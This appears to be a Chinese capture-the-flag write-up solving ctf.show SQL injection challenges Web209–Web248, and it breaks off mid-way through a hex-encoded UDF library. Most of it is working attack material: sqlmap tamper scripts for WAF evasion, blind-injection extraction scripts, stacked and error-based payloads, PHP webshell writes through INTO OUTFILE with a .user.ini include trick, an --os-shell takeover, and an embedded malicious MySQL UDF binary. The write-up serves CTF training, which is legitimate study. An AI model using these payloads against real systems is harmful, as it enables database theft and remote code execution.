'SESELECTLECT id FROM users'
"""

retVal = payload

if payload:
retVal = retVal.replace("COUNT(*)","COUNT(id)")
retVal = retVal.replace(" ",chr(0x0a))
retVal = retVal.replace("=",chr(0x0a)+"like"+chr(0x0a))

return retVal

Web210——sqlmap(自定义tamper)

这题需要对传入的payload进行base64,并且逆序,再base64,再逆序

1
2
3
4
//对查询字符进行解密
function decode($id){
return strrev(base64_decode(strrev(base64_decode($id))));
}

sqlmap命令如下:

1
python3 sqlmap.py -u "http://4501d927-474b-4f61-8c27-f75f13e693fe.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://4501d927-474b-4f61-8c27-f75f13e693fe.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --dump --batch

doubleSelect3.py脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import string
import base64

__priority__ = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):
"""
Replaces space character ('select') with comments 'seselectlect'

Tested against:
* MySQL 5.5

Notes:
* Useful to bypass weak and bespoke web application firewalls

>>> tamper('SELECT id FROM users')
'SESELECTLECT id FROM users'
"""

retVal = payload

if payload:
retVal = retVal.replace(" ",chr(0x0a))
retVal = retVal.replace("COUNT(*)","COUNT(id)")
retVal = base64.b64encode(retVal[::-1].encode('utf-8'))
retVal = base64.b64encode(retVal[::-1]).decode('utf-8')


return retVal

Web211——sqlmap(自定义tamper)

这题和上一题用一样的payload即可

1
python3 sqlmap.py -u "http://6f4d6084-9340-497a-9513-833709b96427.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://6f4d6084-9340-497a-9513-833709b96427.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --dump --batch

Web212——sqlmap(自定义tamper)

这题和前两题一样,一样的payload

1
python3 sqlmap.py -u "http://8f3663f8-b886-4059-a8e4-6e79aed944a0.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://8f3663f8-b886-4059-a8e4-6e79aed944a0.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --dump --batch

Web213——sqlmap(os-shell)

这一题flag不在数据库中,因此需要利用–os-shell进行getshell

payload和上一题大同小异

1
python3 sqlmap.py -u "http://a502893e-c20b-4d93-bd3c-5667a9473042.challenge.ctf.show/api/index.php" --referer="ctf.show" --method=PUT --headers="Content-Type:text/plain" --safe-url="http://a502893e-c20b-4d93-bd3c-5667a9473042.challenge.ctf.show/api/getToken.php" --tamper="doubleSelect3" --safe-freq=1 --data="id=1" --os-shell

然后访问sqlmap输出的地址

image-20220122203543171

上传一句话即可

image-20220122203607776

Web214——时间盲注

这道题没有直接给出注入点,但是在select.js中有提示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
layui.use('element', function(){
var element = layui.element;
element.on('tab(nav)', function(data){
console.log(data);
});
});

$.ajax({
url:'api/',
dataType:"json",
type:'post',
data:{
ip:returnCitySN["cip"],
debug:0
}

});

这题没有过滤,直接盲注即可

列名表名就不爆了,直接上拿flag脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://27c31b93-f596-48dd-bb5b-b941d687ae44.challenge.ctf.show/api/"
payload = "if(ascii(substr((select flaga from ctfshow_flagx),{},1))={},sleep(0.5),1)"

for i in range(100):
for j in flagstr:
data = {
"debug":"0",
"ip":payload.format(i, ord(j))
}
try:
res = requests.post(url, data=data, timeout=0.3)
except:
flag += j
print(flag)
else:
continue

Web215——时间盲注(单引号闭合)

和上题差不多,单引号记得闭合,带上注释即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://89fc8bfe-d034-493c-bb05-8cc1a2d85682.challenge.ctf.show/api/"
payload = "' or if(ascii(substr((select flagaa from ctfshow_flagxc),{},1))={},sleep(0.5),1) #"

for i in range(100):
for j in flagstr:
data = {
"debug":"0",
"ip":payload.format(i, ord(j))
}
try:
res = requests.post(url, data=data, timeout=0.3)
except:
flag += j
print(flag)
else:
continue

Web216——时间盲注(闭合sql语句中的base64)

1
where id = from_base64($id);

这题不能将base64编码之后的字符串作为payload传入,因为base64解码之后,SQL会当做一个字符串而不是一个语句

1
2
3
4
5
6
7
mysql> select from_base64("KiBmcm9tIGN0ZnRhYmxl");
+-------------------------------------+
| from_base64("KiBmcm9tIGN0ZnRhYmxl") |
+-------------------------------------+
| * from ctftable |
+-------------------------------------+
1 row in set (0.01 sec)

所以尝试将语句闭合

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://14d016ef-4056-4ee9-8741-47ae26ab3f3b.challenge.ctf.show/api/"
payload = "'1') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{},1))={},sleep(0.5),1) #"

for i in range(100):
for j in flagstr:
data = {
"debug":"0",
"ip":payload.format(i, ord(j))
}
try:
res = requests.post(url, data=data, timeout=0.3)
except:
flag += j
print(flag)
else:
continue

Web217——时间盲注(benchmark代替base64)

1
2
3
4
//屏蔽危险分子
function waf($str){
return preg_match('/sleep/i',$str);
}

这题禁用了sleep函数,不过可以使用benchmark代替

1
2
benchmark(count, exp)
将exp表达式执行count次,随着count增加,会产生延迟,借此进行时间盲注

benchmark使用效果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mysql> select * from ctftable where user=if(benchmark(10000000,md5(1)),1,"admin");
+----+-------+--------+
| id | user | passwd |
+----+-------+--------+
| 1 | admin | passwd |
+----+-------+--------+
1 row in set (2.55 sec)

mysql> select * from ctftable where user=if(benchmark(1,md5(1)),1,"admin");
+----+-------+--------+
| id | user | passwd |
+----+-------+--------+
| 1 | admin | passwd |
+----+-------+--------+
1 row in set (0.00 sec)

脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import time

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://65a843b3-0560-467f-89d2-37eb70af1063.challenge.ctf.show/api/"
payload = "'1') or if(ascii(substr((select flagaabc from ctfshow_flagxccb),{},1))={},benchmark(1000000,md5(1)),1) #"

for i in range(100):
for j in flagstr:
data = {
"debug":"0",
"ip":payload.format(i, ord(j))
}
try:
res = requests.post(url, data=data, timeout=0.3)
except:
flag += j
print(flag)
time.sleep(0.2)
else:
time.sleep(0.2)
continue

Web218——时间盲注(笛卡尔积、正则表达式、锁表代替sleep、benchmark)

1
2
3
4
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark/i',$str);
}

使用rpad或者repeat构造长字符串,利用正则表达式控制延时

1
concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'
1
2
3
4
5
6
7
8
9
mysql> select * from ctftable where if((concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1,1);
+----+-------+--------+
| id | user | passwd |
+----+-------+--------+
| 1 | admin | passwd |
| 2 | user | pass |
| 3 | Lxxx | 123456 |
+----+-------+--------+
3 rows in set (3.63 sec)

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import time

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://8033ccc0-075e-41b3-b971-3d4953b519f6.challenge.ctf.show/api/"
payload = "'1') or if(ascii(substr((select flagaac from ctfshow_flagxc),{},1))={},(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1) #"

for i in range(100):
for j in flagstr:
data = {
"debug":"0",
"ip":payload.format(i, ord(j))
}
try:
res = requests.post(url, data=data, timeout=0.3)
except:
flag += j
print(flag)
time.sleep(0.2)
else:
time.sleep(0.2)
continue

笛卡尔积延时方法:

1
2
3
4
5
6
笛卡尔积(因为连接表是一个很耗时的操作)
AxB=A和B中每个元素的组合所组成的集合,就是连接表
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
select * from table_name A, table_name B
select * from table_name A, table_name B,table_name C
select count(*) from table_name A, table_name B,table_name C 表可以是同一张表
1
2
3
4
5
6
7
mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B;
+----------+
| count(*) |
+----------+
| 62805625 |
+----------+
1 row in set (1.74 sec)

参考文章:

Web219——时间盲注(使用regexp代替rlike)

1
2
3
4
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark|rlike/i',$str);
}

这题和上题差不多,表名改了一下,过滤了rlike,使用regexp代替rlike即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import time

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://1fc4d6ea-2eaf-4fb9-8cef-313556135676.challenge.ctf.show/api/"
payload = "'1') or if(ascii(substr((select flagaabc from ctfshow_flagxca),{},1))={},(concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) REGEXP '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1) #"

for i in range(100):
for j in flagstr:
data = {
"debug":"0",
"ip":payload.format(i, ord(j))
}
try:
res = requests.post(url, data=data, timeout=0.3)
except:
flag += j
print(flag)
time.sleep(0.2)
break
else:
time.sleep(0.2)
continue

Web220——时间盲注(利用笛卡尔积进行时间盲注)

1
2
3
4
//屏蔽危险分子
function waf($str){
return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}

笛卡尔积延时方法:

1
2
3
4
5
6
笛卡尔积(因为连接表是一个很耗时的操作)
AxB=A和B中每个元素的组合所组成的集合,就是连接表
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
select * from table_name A, table_name B
select * from table_name A, table_name B,table_name C
select count(*) from table_name A, table_name B,table_name C 表可以是同一张表
1
2
3
4
5
6
7
mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B;
+----------+
| count(*) |
+----------+
| 62805625 |
+----------+
1 row in set (1.74 sec)

脚本如下:

注意这里过滤了substr,利用like代替,这题误差会有点大,time.sleep的时间由自己的网络状况而定

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import time

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://52153ae3-dc5b-4be8-a12d-4ea2f085ebfc.challenge.ctf.show/api/"
payload = "if((select flagaabcc from ctfshow_flagxcac) like '{}%',(SELECT count(*) FROM information_schema.columns A, information_schema.columns B),1)"

for i in range(100):
for j in flagstr:
data = {
"debug":"0",
"ip":payload.format(flag+j)
}
try:
res = requests.post(url, data=data, timeout=0.2)
except:
flag += j
print(flag)
time.sleep(0.2)
break
else:
time.sleep(0.2)
continue

Web221——其他注入(MySQL 5.5.x版本limit注入)

在MySQL 5.5.x版本中可以在limit后实现SQL注入,先放一篇p牛的文章

limit后报错注入

1
2
mysql> SELECT * FROM ctftable WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 
1105 - XPATH syntax error: ':5.5.41'

limit后时间延时注入

1
2
mysql> SELECT * FROM ctftable WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(ASCII(MID(database(),1,1)) LIKE 76, BENCHMARK(5000000,SHA1(1)),1))))),1);
1105 - XPATH syntax error: ':0'

这题只需要拿一个数据库名字,payload如下

1
/api/?page=1&limit=7%20procedure%20analyse(extractvalue(1,concat(0x7e,database(),0x7e)),1)

数据库名字:ctfshow_web_flag_x

Web222——其他注入(group by注入)

1
2
3
4
5
6
7
form.on('submit(*)', function(data){
var table = layui.table;
table.reload('user_table', {
url:'api/?u=username'
})
return false;
});

这题考察group by注入

1
/api/?u=id

在这个地方可以直接盲注

1
/api/?u=if(1,id,0)

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import time

import requests

flagstr = "ctfshow1234567890abde{_-}"
flag = ""
url = "http://16103046-1e03-4013-b799-657ac0987928.challenge.ctf.show/api/"
payload = "if(ascii(substr((select flagaabc from ctfshow_flaga),{},1))={},id,0)"

for i in range(100):
for j in flagstr:
param = {
"u":payload.format(i, ord(j))
}
res = requests.get(url, params=param)
if "userAUTO" in res.text:
flag += j
print(flag)
break
time.sleep(0.2)

Web223——其他注入(group by注入,利用true绕过数字)

1
2
//TODO:很安全,不需要过滤
//用户名不能是数字

这一题不允许有数字,前面也有讲过,利用true和false绕过数字

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
mysql> select true;
+------+
| TRUE |
+------+
| 1 |
+------+
1 row in set (0.04 sec)

mysql> select false;
+-------+
| FALSE |
+-------+
| 0 |
+-------+
1 row in set (0.02 sec)

mysql> select true+true+true;
+----------------+
| true+true+true |
+----------------+
| 3 |
+----------------+
1 row in set (0.03 sec)

Web224——其他注入(文件名注入)

这道题原理有些复杂,这里给出题解,后面单独写一篇文章讲解原理

robot.txt

1
2
User-agent: *
Disallow: /pwdreset.php

访问/pwdreset.php即可重置密码进入后台

后台是一个文件上传页面:

image-20220124214549138

这里允许上传zip,bin文件,这题上传的payload文件链接如下:(文件压缩过,请解压之后使用)

上传之后就会在网站目录下生成一个1.php,get形式的一句话,密码为1

1
/1.php?1=echo `cat%20/flag`;

执行后即可得到flag

具体原理可参考下方的博客,之后也会再整理

Web225——堆叠注入提升(handler与预处理)

预处理:

1
api/?username=';PREPARE Lxxx from concat('s','elect', ' database()');EXECUTE Lxxx;
1
';PREPARE Lxxx from concat('s','elect', ' group_concat(column_name) from information_schema.columns where table_name=\'ctfshow_flagasa\'');EXECUTE Lxxx;
1
';PREPARE Lxxx from concat('s','elect', ' flagas from ctfshow_flagasa');EXECUTE Lxxx;

hanlder:

1
';show tables;
1
';handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

Web226——堆叠注入提升(十六进制绕过handler,预处理)

1
2
3
4
//师傅说过滤的越多越好
if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
die(json_encode($ret));
}

预处理:

1
';PREPARE Lxxx from 0x73656c65637420666c61676173622066726f6d2063746673685f6f775f666c61676173;EXECUTE Lxxx;

handler:

1
';handler ctfsh_ow_flagas open;handler ctfsh_ow_flagas read first;

Web227——堆叠注入提升(查看存储过程和函数)

information_schema.routines 查看存储过程和函数

1
';PREPARE Lxxx from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;EXECUTE Lxxx;

Web228——堆叠注入提升(十六进制、预处理)

1
2
';PREPARE Lxxx from
0x73656c6563742067726f75705f636f6e636174287461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573207768657265207461626c655f736368656d613d2763746673686f775f77656227;EXECUTE Lxxx;
1
';handler ctfsh_ow_flagasaa open;handler ctfsh_ow_flagasaa read first;

Web229——堆叠注入提升(十六进制、预处理)

这题过滤了open,那就用预处理拿flag

1
2
';PREPARE Lxxx from
0x73656c65637420666c6167617362612066726f6d20666c6167;EXECUTE Lxxx;

Web230——堆叠注入提升(十六进制、预处理)

和上题一样

1
';PREPARE Lxxx from 0x73656c65637420666c616761736261732066726f6d20666c61676161626278;EXECUTE Lxxx;

Web231——update注入(无过滤)

select.js内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$.ajax({
url:'api/',
type:'post',
data:{
'username':obj.data.username,
'password':obj.data.pass
},
success:function(data){
layer.msg(JSON.parse(data).msg);
table.reload('user_table', {
url:'api/'
});
}
});

因此post传username以及password

访问api页面

1
password=user',username=database() where 1=1#&username=1

返回update.php得到数据库名为ctfshow_web

1
password=user',username=(select flagas from flaga) where 1=1#&username=1

返回页面,拿flag

Web232——update注入(闭合注入)

1
2
//分页查询
$sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";

换了一个闭合方式,payload如下

1
password=123') ,username=(select flagass from flagaa)where 1=1#&username=1

Web233——update注入(延时注入)

这题利用延时注入,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests

url = "http://775e9c84-659d-4dc1-b832-b4ffb0202410.challenge.ctf.show/api/"
flagstr = "ctfshow1234567890abde{_-}"
payload = "1' or if(ascii(substr((select flagass233 from flag233333),{},1))<={},sleep(0.02),0)#"
flag = ""

for i in range(100):
max = 127
min = 33
while True:
mid = (max + min) // 2
data = {
"username":payload.format(i, mid),
"password":"1"
}
try:
res = requests.post(url, data=data, timeout=0.4)
except:
max = mid
else:
min = mid + 1
if min == 33:
break
if max == min:
flag += chr(max)
print(flag)
break

Web234——update注入(反斜杠绕过单引号)

这题过滤了单引号,但是没有过滤反斜杠,所以传入反斜杠可以将单引号转义

1
username=,username=(select flagass23s3 from flag23a)#&password=\

SQL语句相当于

1
update ctfshow_user set pass = '\' where username = ',username=(select flagass23s3 from flag23a)#';

Web235——update注入(绕过information_schema,无列名注入)

information_schema绕过:

过滤了information_schema,可以在mysql.innodb_table_stats中查看表名

无列名注入:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
mysql> select * from ctftable;
+----+-------+--------+
| id | user | passwd |
+----+-------+--------+
| 1 | admin | passwd |
| 2 | user | pass |
| 3 | Lxxx | 123456 |
+----+-------+--------+
3 rows in set (0.00 sec)

mysql> select group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`) from (select 1,2 as Lxxx,3 union select * from ctftable)a;
+------------------------------------------------+
| group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`) |
+------------------------------------------------+
| 2-1-3,admin-1-passwd,user-2-pass,Lxxx-3-123456 |
+------------------------------------------------+
1 row in set (0.00 sec)

payload如下:

1
username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#&password=1\
1
username=,username=(select group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`) from (select 1,2 as Lxxx,3 union select * from flag23a1)a)#&password=1\

Web236——update注入(绕过information_schema,无列名注入)

表面上过滤了flag,其实没有过滤,payload和上一题一样

1
username=,username=(select group_concat(`Lxxx`,0x2d,`1`,0x2d,`3`) from (select 1,2 as Lxxx,3 union select * from flaga)a)#&password=1\

Web237——insert注入(无过滤)

没有过滤,直接闭合注入即可

1
username=',(select flagass23s3 from ctfshow_web.flag))#&password=1

Web238——insert注入(过滤空格)

1
username=',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())));#&password=1
1
username=123',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')));#&password=1
1
username=',(select(flag)from(flagb)));#&password=1

Web239——insert注入(无列名注入)

1
username=',(select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())));#&password=1
1
username=',(select(flag)from(flagbb)));#&password=123

Web240——insert注入(时间盲注)

这题考察延时注入,题目给了表名为flagaaaaa这种形式,利用dfs遍历出这32中可能即可。

然后跑一下脚本,脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import time
import requests

url = "http://3788a983-3cf6-43ab-8847-0462b58a9be0.challenge.ctf.show/api/insert.php"
url_flag = "http://3788a983-3cf6-43ab-8847-0462b58a9be0.challenge.ctf.show/api/?page=1&limit=1000"
payload = "Lxxx',(select(flag)from(flag{})));#"
ls = []

def dfs(password, step):
if step == 5:
ls.append(password)
return
dfs(password+"a", step+1)
dfs(password+"b", step+1)
dfs("",0)
for i in range(31):
data = {
"username":payload.format(ls[i]),
"password":"123"
}
res1 = requests.post(url, data=data)
time.sleep(0.2)
res2 = requests.get(url_flag)
if "Lxxx" in res2.text:
print(res2.text)

Web241——delete注入(时间盲注)

这题只能使用时间盲注,注入的时候注意一下sleep的时间,稍微短一点,因为sleep0.1秒,网页不止sleep0.1秒。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import time

import requests

url = "http://58c1b2e2-3b05-4514-9165-3b3121716139.challenge.ctf.show/api/delete.php"
flagstr = "ctfshow1234567890abde{_-}"
payload = "if(ascii(substr((select flag from flag),{},1))={},sleep(0.1),0)"
flag = ""

for i in range(1, 100):
for j in flagstr:
data = {
"id":payload.format(i, ord(j))
}
print(data)
time.sleep(2)
try:
res = requests.post(url, data=data, timeout=1)
except:
flag += j
print(flag)
break
else:
continue

Web242——file文件注入(写入一句话)

FIELDS TERMINATED BY '字符串':设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。
FIELDS ENCLOSED BY '字符':设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。
FIELDS OPTIONALLY ENCLOSED BY '字符':设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。 默认情况下不使用任何符号。
FIELDS ESCAPED BY '字符':设置转义字符,只能为单个字符。默认值为“\”。
LINES STARTING BY '字符串':设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用
任何字符。
LINES TERMINATED BY '字符串':设置每行数据结尾的字符,可以为单个或多个字符。默认值 是“\n”。

1
1.php' FIELDS TERMINATED BY "<?php eval($_POST[1]);?>";#

Web243——file文件注入(写入.user.ini绕过php)

这题题目过滤了PHP,因此无法直接写入一句话到php文件中

但是可以利用文件上传的思路,上传.user.ini文件,自动包含图片马进行getshell

首先传入的.user.ini需要将前一行进行注释,.user.ini中使用;注释即可

payload如下:(0a为换行,后面为auto_prepend_file=1.png

1
.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d312e706e670a;#

.user.ini配置完成后,再传入图片马即可

1
1.png' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b315d293b3f3e;#

接着访问dump/index.php即可,密码为1

Web244——报错注入(无过滤)

这一部分是报错注入,这里先给出payload,到时候再详细总结报错注入,

1
1' or updatexml(1,concat(0x7e,substr((select group_concat(flag) from ctfshow_flag),1,30),0x7e),1)--+

因为updatexml一次只能报错32位,而flag不止32位,因此多截取一下即可

Web245——报错注入(过滤updatexml)

过滤了updatexml,可以使用extractvalue代替

1
1' or extractvalue(1,concat(0x7e,substr((select group_concat(flag1) from ctfshow_flagsa),1,30),0x7e))--+

Web246——报错注入(过滤updatexml,extractvalue)

这题过滤updatexml,extractvalue,可以尝试floor进行报错注入

1
1' or 1 group by concat_ws(0x7e,(select flag2 from ctfshow_flags),floor(rand(0)*2)) having min(0) or 1 --+
1
1' union select 1,count(*),concat(0x7e,(select flag2 from ctfshow_flags),0x7e,floor(rand(0)*2))b from information_schema.tables group by b --+

Web247——报错注入(过滤updatexml,extractvalue,floor)

这题过滤updatexml,extractvalue,floor,其实类似round()ceil()也可以代替floor()

具体原理,到时候专门出一篇文章阐述

1
1' union select 1,count(*),concat(0x7e,(select `flag?` from ctfshow_flagsa),0x7e,round(rand(0)*2))b from information_schema.tables group by b --+

Web248——udf注入

这个udf注入,先把poc放出来,之后专门出一篇文章讲解(挖坑++;)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import requests

base_url="http://f6ec71af-de5f-48a7-af4e-367a4e0ee634.challenge.ctf.show/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006